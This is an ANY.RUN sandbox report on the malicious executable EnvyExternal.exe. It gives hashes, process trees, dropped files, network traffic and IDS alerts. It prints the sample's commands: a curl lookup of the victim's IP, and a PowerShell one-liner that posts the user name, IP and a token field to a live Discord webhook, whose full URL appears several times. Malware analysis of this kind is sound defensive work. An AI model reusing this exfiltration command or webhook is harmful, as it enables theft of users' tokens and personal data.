File name:

EnvyExternal.exe

Full analysis: https://app.any.run/tasks/7c919e41-3d61-4106-b710-6f97223b2228
Verdict: Malicious activity
Analysis date: November 23, 2024, 19:27:34
OS: Windows 11 Professional (build: 22000, 64 bit)
Tags:
evasion
discord
ims-api
generic
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (console) Intel 80386, for MS Windows, 5 sections
MD5:

74085E676FB6C08FA0437BA5CDD046CA

SHA1:

6CD3C7951D08AEC6C7BA8EA12E0FFDAA4FCF15AC

SHA256:

FC8F4A8D60EC80B1FADB027978E74C7B5D1645D09D646CABA48700D742392343

SSDEEP:

3072:3CYa+0Nu6vQAkQ5S7JmyxCbBKhiTbMKxs:EQLi8NiTb9xs

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    No malicious indicators.

  • SUSPICIOUS

    • Executing commands from a ".bat" file

      • EnvyExternal.exe (PID: 912)

    • Application launched itself

      • cmd.exe (PID: 1096)

    • Starts CMD.EXE for commands execution

      • EnvyExternal.exe (PID: 912)
      • cmd.exe (PID: 1096)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 1096)

    • Reads the Internet Settings

      • powershell.exe (PID: 5700)

    • Potential Corporate Privacy Violation

      • curl.exe (PID: 1380)

    • Possible usage of Discord/Telegram API has been detected (YARA)

      • EnvyExternal.exe (PID: 912)
      • cmd.exe (PID: 1096)

    • Checks for external IP

      • curl.exe (PID: 1380)

  • INFO

    • Checks supported languages

      • EnvyExternal.exe (PID: 912)
      • curl.exe (PID: 1380)

    • Create files in a temporary directory

      • EnvyExternal.exe (PID: 912)

    • Reads the computer name

      • curl.exe (PID: 1380)

    • Disables trace logs

      • powershell.exe (PID: 5700)

    • Checks proxy server information

      • powershell.exe (PID: 5700)

    • Attempting to use instant messaging service

      • powershell.exe (PID: 5700)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 5700)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

ims-api

(PID) Process(912) EnvyExternal.exe
Discord-Webhook-Tokens (1)1309955999985303634/sOOrkQMIa8bOLIW3gbjVkBDhXV-QdgIi8U2GsRcfrI7YiRnQFP-l03EqKXGm9koQXTUQ
Discord-Info-Links
1309955999985303634/sOOrkQMIa8bOLIW3gbjVkBDhXV-QdgIi8U2GsRcfrI7YiRnQFP-l03EqKXGm9koQXTUQ
Get Webhook Infohttps://discord.com/api/webhooks/1309955999985303634/sOOrkQMIa8bOLIW3gbjVkBDhXV-QdgIi8U2GsRcfrI7YiRnQFP-l03EqKXGm9koQXTUQ
(PID) Process(1096) cmd.exe
Discord-Webhook-Tokens (1)1309955999985303634/sOOrkQMIa8bOLIW3gbjVkBDhXV-QdgIi8U2GsRcfrI7YiRnQFP-l03EqKXGm9koQXTUQ
Discord-Info-Links
1309955999985303634/sOOrkQMIa8bOLIW3gbjVkBDhXV-QdgIi8U2GsRcfrI7YiRnQFP-l03EqKXGm9koQXTUQ
Get Webhook Infohttps://discord.com/api/webhooks/1309955999985303634/sOOrkQMIa8bOLIW3gbjVkBDhXV-QdgIi8U2GsRcfrI7YiRnQFP-l03EqKXGm9koQXTUQ
No Malware configuration.

TRiD

.exe | Win32 Executable MS Visual C++ (generic) (41)
.exe | Win64 Executable (generic) (36.3)
.dll | Win32 Dynamic Link Library (generic) (8.6)
.exe | Win32 Executable (generic) (5.9)
.exe | Win16/32 Executable Delphi generic (2.7)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2019:07:30 08:52:45+00:00
ImageFileCharacteristics: No relocs, Executable, No line numbers, No symbols, 32-bit
PEType: PE32
LinkerVersion: 2.5
CodeSize: 70656
InitializedDataSize: 20480
UninitializedDataSize: -
EntryPoint: 0x1000
OSVersion: 4
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows command line
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
117
Monitored processes
6
Malicious processes
3
Suspicious processes
1

Behavior graph

Click at the process to see the details
start envyexternal.exe no specs conhost.exe no specs cmd.exe no specs cmd.exe no specs curl.exe powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
912"C:\Users\admin\Desktop\EnvyExternal.exe" C:\Users\admin\Desktop\EnvyExternal.exe
explorer.exe
User:
admin
Integrity Level:
MEDIUM
Modules
Images
c:\users\admin\desktop\envyexternal.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64base.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64con.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
ims-api
(PID) Process(912) EnvyExternal.exe
Discord-Webhook-Tokens (1)1309955999985303634/sOOrkQMIa8bOLIW3gbjVkBDhXV-QdgIi8U2GsRcfrI7YiRnQFP-l03EqKXGm9koQXTUQ
Discord-Info-Links
1309955999985303634/sOOrkQMIa8bOLIW3gbjVkBDhXV-QdgIi8U2GsRcfrI7YiRnQFP-l03EqKXGm9koQXTUQ
Get Webhook Infohttps://discord.com/api/webhooks/1309955999985303634/sOOrkQMIa8bOLIW3gbjVkBDhXV-QdgIi8U2GsRcfrI7YiRnQFP-l03EqKXGm9koQXTUQ
1096"C:\Windows\sysnative\cmd" /c "C:\Users\admin\AppData\Local\Temp\F404.tmp\F405.tmp\F406.bat C:\Users\admin\Desktop\EnvyExternal.exe"C:\Windows\System32\cmd.exe
EnvyExternal.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
ims-api
(PID) Process(1096) cmd.exe
Discord-Webhook-Tokens (1)1309955999985303634/sOOrkQMIa8bOLIW3gbjVkBDhXV-QdgIi8U2GsRcfrI7YiRnQFP-l03EqKXGm9koQXTUQ
Discord-Info-Links
1309955999985303634/sOOrkQMIa8bOLIW3gbjVkBDhXV-QdgIi8U2GsRcfrI7YiRnQFP-l03EqKXGm9koQXTUQ
Get Webhook Infohttps://discord.com/api/webhooks/1309955999985303634/sOOrkQMIa8bOLIW3gbjVkBDhXV-QdgIi8U2GsRcfrI7YiRnQFP-l03EqKXGm9koQXTUQ
1380curl -s https://api.ipify.orgC:\Windows\System32\curl.exe
cmd.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
MEDIUM
Description:
The curl executable
Exit code:
35
Version:
7.83.1
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
1564C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.orgC:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
35
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
5092\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exeEnvyExternal.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
5700powershell -Command "$uri='https://discord.com/api/webhooks/1309955999985303634/sOOrkQMIa8bOLIW3gbjVkBDhXV-QdgIi8U2GsRcfrI7YiRnQFP-l03EqKXGm9koQXTUQ'; $json=@{content='Time: 19-27-42.83 - - Desktop User: admin - - IP: - - Token: Token-'} | ConvertTo-Json -Depth 1; Invoke-RestMethod -Uri $uri -Method Post -ContentType 'application/json' -Body $json"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
Total events
4 989
Read events
4 989
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
1
Text files
4
Unknown types
0

Dropped files

PID
Process
Filename
Type
5700powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ivs3et0q.zbl.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5700powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_obw30f4b.vpb.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5700powershell.exeC:\Users\admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logtext
MD5:84FB158ACA05199E1E8B0FA886ABD026
SHA256:F72863F13D67A92CD55F718E0CB78FFB6407045E196C07B96A810260B646F29E
912EnvyExternal.exeC:\Users\admin\AppData\Local\Temp\F404.tmp\F405.tmp\F406.battext
MD5:0F6F09C7B945EF6E2B8B70C1D920DCD7
SHA256:86C73BCD39D4E65D7A849FE486242C718D7AA4AB9DD86FEB9691D0788CBFF9D2
5700powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:112C732C504273944C200FD62FC34480
SHA256:48961C30063FE68991805F9B0B49072EA683AF1A7872158BBCBA34DFE7BC6BD3
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
20
TCP/UDP connections
30
DNS requests
35
Threats
6

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
752
lsass.exe
GET
304
23.53.40.49:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?f484045c209bb483
unknown
whitelisted
6656
MoUsoCoreWorker.exe
GET
304
23.53.40.49:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?c1c458885a3ece16
unknown
whitelisted
1296
svchost.exe
GET
200
23.55.161.193:80
http://www.msftconnecttest.com/connecttest.txt
unknown
whitelisted
1776
firefox.exe
POST
200
192.229.221.95:80
http://ocsp.digicert.com/
unknown
whitelisted
1776
firefox.exe
POST
200
95.101.74.216:80
http://r10.o.lencr.org/
unknown
whitelisted
1776
firefox.exe
POST
200
192.229.221.95:80
http://ocsp.digicert.com/
unknown
whitelisted
1776
firefox.exe
POST
200
95.101.74.200:80
http://r10.o.lencr.org/
unknown
whitelisted
HEAD
200
23.210.18.164:443
https://fs.microsoft.com/fs/windows/config.json
unknown
2860
svchost.exe
GET
304
217.20.57.40:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?934a2adae5bf7775
unknown
whitelisted
2860
svchost.exe
GET
200
217.20.57.40:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/pinrulesstl.cab?d427199d7579a766
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
5552
svchost.exe
239.255.255.250:1900
whitelisted
6652
rundll32.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
192.168.100.255:137
whitelisted
3432
OfficeC2RClient.exe
52.109.89.18:443
officeclient.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
52.109.89.18:443
officeclient.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
1776
firefox.exe
34.149.100.209:443
firefox.settings.services.mozilla.com
GOOGLE
US
whitelisted
1776
firefox.exe
34.120.208.123:443
incoming.telemetry.mozilla.org
GOOGLE-CLOUD-PLATFORM
US
whitelisted
1296
svchost.exe
23.55.161.193:80
Akamai International B.V.
DE
unknown
1380
curl.exe
104.26.13.205:443
api.ipify.org
CLOUDFLARENET
US
shared
752
lsass.exe
23.53.40.49:80
ctldl.windowsupdate.com
Akamai International B.V.
DE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
whitelisted
officeclient.microsoft.com
  • 52.109.89.18
whitelisted
firefox.settings.services.mozilla.com
  • 34.149.100.209
whitelisted
incoming.telemetry.mozilla.org
  • 34.120.208.123
whitelisted
prod.remote-settings.prod.webservices.mozgcp.net
  • 34.149.100.209
whitelisted
telemetry-incoming.r53-2.services.mozilla.com
  • 34.120.208.123
whitelisted
google.com
  • 142.250.74.206
whitelisted
api.ipify.org
  • 104.26.13.205
  • 172.67.74.152
  • 104.26.12.205
shared
ctldl.windowsupdate.com
  • 23.53.40.49
  • 23.53.40.35
  • 217.20.57.40
  • 217.20.57.43
  • 84.201.210.39
  • 84.201.210.22
  • 84.201.210.23
  • 84.201.210.38
  • 217.20.57.25
whitelisted
ecs.office.com
  • 52.113.194.132
whitelisted

Threats

PID
Process
Class
Message
1296
svchost.exe
Misc activity
ET INFO Microsoft Connection Test
1656
svchost.exe
Misc activity
ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup
1380
curl.exe
Misc activity
ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI
1380
curl.exe
Potential Corporate Privacy Violation
ET POLICY Possible IP Check api.ipify.org
1656
svchost.exe
Misc activity
ET INFO Observed Discord Domain in DNS Lookup (discord .com)
5700
powershell.exe
Misc activity
ET INFO Observed Discord Domain (discord .com in TLS SNI)
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
EnvyExternal.exe